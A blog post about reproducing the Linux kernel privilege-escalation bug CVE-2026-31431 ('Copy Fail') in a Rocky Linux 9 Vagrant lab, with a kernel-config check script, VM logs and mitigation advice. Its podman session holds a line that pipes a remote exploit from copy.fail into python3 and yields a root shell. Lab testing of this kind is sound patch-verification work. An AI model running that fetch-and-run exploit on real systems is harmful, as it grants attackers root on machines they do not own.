Recently I decided to add to my blog /dev/null some posts where I try out a CVE. This exercise can come in handy for my work on LFS, and it also reminds me to patch my own servers… If I've written an article about it, I can't forget to update 😀

The CVE in question is CVE-2026-31431 Copy Fail, on which I won't give too many details since there is already plenty online (https://nvd.nist.gov/vuln/detail/CVE-2026-31431 / https://en.wikipedia.org/wiki/Copy_Fail), but I'll try to explain how to test it on Rocky Linux 9.

First of all, I need a machine with a vulnerable kernel.

I pull down a Rocky 9 box with Vagrant and add a grep over the build-time kernel configuration (/boot/config-$(uname -r)).

If CONFIG_CRYPTO_USER_API_AEAD is set to y, it means the feature is not a module loaded on demand, but is compiled straight into the kernel image.

I'd say a Rocky 9.3 (Blue Onyx) is fine for the test.

$script = <<-SCRIPT
grep CONFIG_CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
SCRIPT


Vagrant.configure("2") do |config|
  config.vm.box = "generic/rocky9"

  config.vm.define "rocky9" do |node|
    node.vm.hostname = "rocky9"

    node.vm.provider :libvirt do |libvirt|
      libvirt.memory = 2048
      libvirt.cpus   = 2
      libvirt.driver = "kvm"
    end

    node.vm.provision "shell", inline: $script
  end
end
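The provisioner above greps a single line out of the kernel config. The script below is an added example, not code from the post, that expands that grep into a small check: it classifies how CONFIG_CRYPTO_USER_API_AEAD was built (compiled in, loadable module, or disabled), first on constructed sample configs and then on the running kernel if its config is readable. The function names are this example's own, and the sample configs are constructed, not taken from a real Rocky kernel.

```shell
#!/bin/sh
# Added example (not from the original post): report how the kernel was built
# with respect to CONFIG_CRYPTO_USER_API_AEAD, the option the provisioner greps.
# Function names are hypothetical (this example's own); sample configs are constructed.
#
# classify_aead_config prints one of:
#   builtin  (=y, compiled into the kernel image)
#   module   (=m, loadable module)
#   disabled ("# ... is not set")
#   unknown  (option absent or file unreadable)

classify_aead_config() {
  config_file="$1"

  if [ ! -r "$config_file" ]; then
    echo unknown
    return 1
  fi

  # Kconfig emits exactly one of: CONFIG_X=y, CONFIG_X=m, or "# CONFIG_X is not set".
  value=$(grep -E '^CONFIG_CRYPTO_USER_API_AEAD=' "$config_file" | cut -d= -f2)
  case "$value" in
    y) echo builtin ;;
    m) echo module ;;
    '')
      if grep -qE '^# CONFIG_CRYPTO_USER_API_AEAD is not set' "$config_file"; then
        echo disabled
      else
        echo unknown
      fi
      ;;
    *) echo unknown ;;
  esac
}

# Locate the running kernel's config: /boot/config-<release> on Rocky and most
# distributions, or /proc/config.gz (decompressed to a temp file) when exposed.
running_kernel_config() {
  release=$(uname -r)
  if [ -r "/boot/config-$release" ]; then
    echo "/boot/config-$release"
  elif [ -r /proc/config.gz ]; then
    tmp=$(mktemp)
    zcat /proc/config.gz > "$tmp"
    echo "$tmp"
  else
    return 1
  fi
}

# Constructed sample configs covering the three Kconfig states, so the
# classifier can be exercised offline without a Rocky VM.
write_sample_configs() {
  dir="$1"
  printf 'CONFIG_CRYPTO_USER_API=y\nCONFIG_CRYPTO_USER_API_AEAD=y\n' > "$dir/builtin.cfg"
  printf 'CONFIG_CRYPTO_USER_API=m\nCONFIG_CRYPTO_USER_API_AEAD=m\n' > "$dir/module.cfg"
  printf 'CONFIG_CRYPTO_USER_API=y\n# CONFIG_CRYPTO_USER_API_AEAD is not set\n' > "$dir/disabled.cfg"
}

# Demo: the constructed samples first, then the running kernel if its config is readable.
samples=$(mktemp -d)
write_sample_configs "$samples"
for name in builtin module disabled; do
  printf '%s.cfg -> %s\n' "$name" "$(classify_aead_config "$samples/$name.cfg")"
done
rm -rf "$samples"

if cfg=$(running_kernel_config); then
  printf 'running kernel (%s) -> %s\n' "$(uname -r)" "$(classify_aead_config "$cfg")"
else
  echo 'running kernel -> config not found (no /boot/config-* or /proc/config.gz)'
fi
```

Inside the Vagrant box the last line is what matters: a result of builtin matches the provisioner output CONFIG_CRYPTO_USER_API_AEAD=y shown below, and tells you the feature cannot simply be left unloaded.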

I go ahead with a vagrant up

luckysideburn@pop-os:~/accollo_cve$ vagrant destroy && vagrant up
[fog][WARNING] Unrecognized arguments: libvirt_ip_command
    rocky9: Are you sure you want to destroy the 'rocky9' VM? [y/N] y
==> rocky9: Removing domain...
==> rocky9: Deleting the machine folder
Bringing machine 'rocky9' up with 'libvirt' provider...
==> rocky9: Checking if box 'generic/rocky9' version '4.3.12' is up to date...
[fog][WARNING] Unrecognized arguments: libvirt_ip_command
==> rocky9: Creating image (snapshot of base box volume).
==> rocky9: Creating domain with the following settings...
==> rocky9:  -- Name:              accollo_cve_rocky9
==> rocky9:  -- Description:       Source: /home/luckysideburn/accollo_cve/Vagrantfile
==> rocky9:  -- Domain type:       kvm
==> rocky9:  -- Cpus:              2
==> rocky9:  -- Feature:           acpi
==> rocky9:  -- Feature:           apic
==> rocky9:  -- Feature:           pae
==> rocky9:  -- Clock offset:      utc
==> rocky9:  -- Memory:            2048M
==> rocky9:  -- Base box:          generic/rocky9
==> rocky9:  -- Storage pool:      default
==> rocky9:  -- Image(vda):        /var/lib/libvirt/images/accollo_cve_rocky9.img, virtio, 128G
==> rocky9:  -- Disk driver opts:  cache='default'
==> rocky9:  -- Graphics Type:     vnc
==> rocky9:  -- Video Type:        cirrus
==> rocky9:  -- Video VRAM:        256
==> rocky9:  -- Video 3D accel:    false
==> rocky9:  -- Keymap:            en-us
==> rocky9:  -- TPM Backend:       passthrough
==> rocky9:  -- INPUT:             type=mouse, bus=ps2
==> rocky9: Creating shared folders metadata...
==> rocky9: Starting domain.
==> rocky9: Domain launching with graphics connection settings...
==> rocky9:  -- Graphics Port:      5900
==> rocky9:  -- Graphics IP:        127.0.0.1
==> rocky9:  -- Graphics Password:  Not defined
==> rocky9:  -- Graphics Websocket: 5700
==> rocky9: Waiting for domain to get an IP address...
==> rocky9: Waiting for machine to boot. This may take a few minutes...
    rocky9: SSH address: 192.168.121.171:22
    rocky9: SSH username: vagrant
    rocky9: SSH auth method: private key
    rocky9:
    rocky9: Vagrant insecure key detected. Vagrant will automatically replace
    rocky9: this with a newly generated keypair for better security.
    rocky9:
    rocky9: Inserting generated public key within guest...
    rocky9: Removing insecure key from the guest if it's present...
    rocky9: Key inserted! Disconnecting and reconnecting using new SSH key...
==> rocky9: Machine booted and ready!
==> rocky9: Setting hostname...
==> rocky9: Running provisioner: shell...
    rocky9: Running: inline script
    rocky9: CONFIG_CRYPTO_USER_API_AEAD=y

I had compatibility problems with the exploit https://copy.fail/#exploit, which (at least so far) doesn't run under python3.9, so, as also suggested by this GitHub user, I'll run it via podman https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/47

[root@rocky9 ~]# podman run --user 1000:1000 -it  --rm python:3.11 bash
Resolved "python" as an alias (/etc/containers/registries.conf.d/000-shortnames.conf)
Trying to pull docker.io/library/python:3.11...
Getting image source signatures
Copying blob 6cf369abc841 done   |
Copying blob 3b32e3bb7338 done   |
Copying blob 20d12c8f3f3f done   |
Copying blob 5467f93954cf done   |
Copying blob 1e1bb20756a8 done   |
Copying blob 5e69c8985c08 done   |
Copying blob c380448934e9 done   |
Copying config 1683e38056 done   |
Writing manifest to image destination
vagrant@cf1f4bfcee10:/$
vagrant@cf1f4bfcee10:/$
vagrant@cf1f4bfcee10:/$ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   5231      0 --:--:-- --:--:-- --:--:--  5258
#
#
# whoami
root
#
#
# exit

So we wait, trusting, as advised in the Rocky community https://forums.rockylinux.org/t/cve-2026-31431-copy-fail-linux-kernel-crypto-vulnerability/20375/10

For the time being we just have to wait until the appropriate packages are updated with fixes, eg: new kernel. As already said by @FrankCox the impact probably isn’t that bad considering it requires someone to actually have access to your server with an existing account.

and, moreover, care must be taken when applying a mitigation https://kb.ciq.com/article/rocky-linux/rl-cve-2026-31431-mitigation

WARNING Disabling AEAD registration removes a kernel feature that some software relies on. Read the Notes section below and validate against your workload before rolling this out fleet-wide. This is a mitigation, not a fix. Revert it once a patched kernel is installed.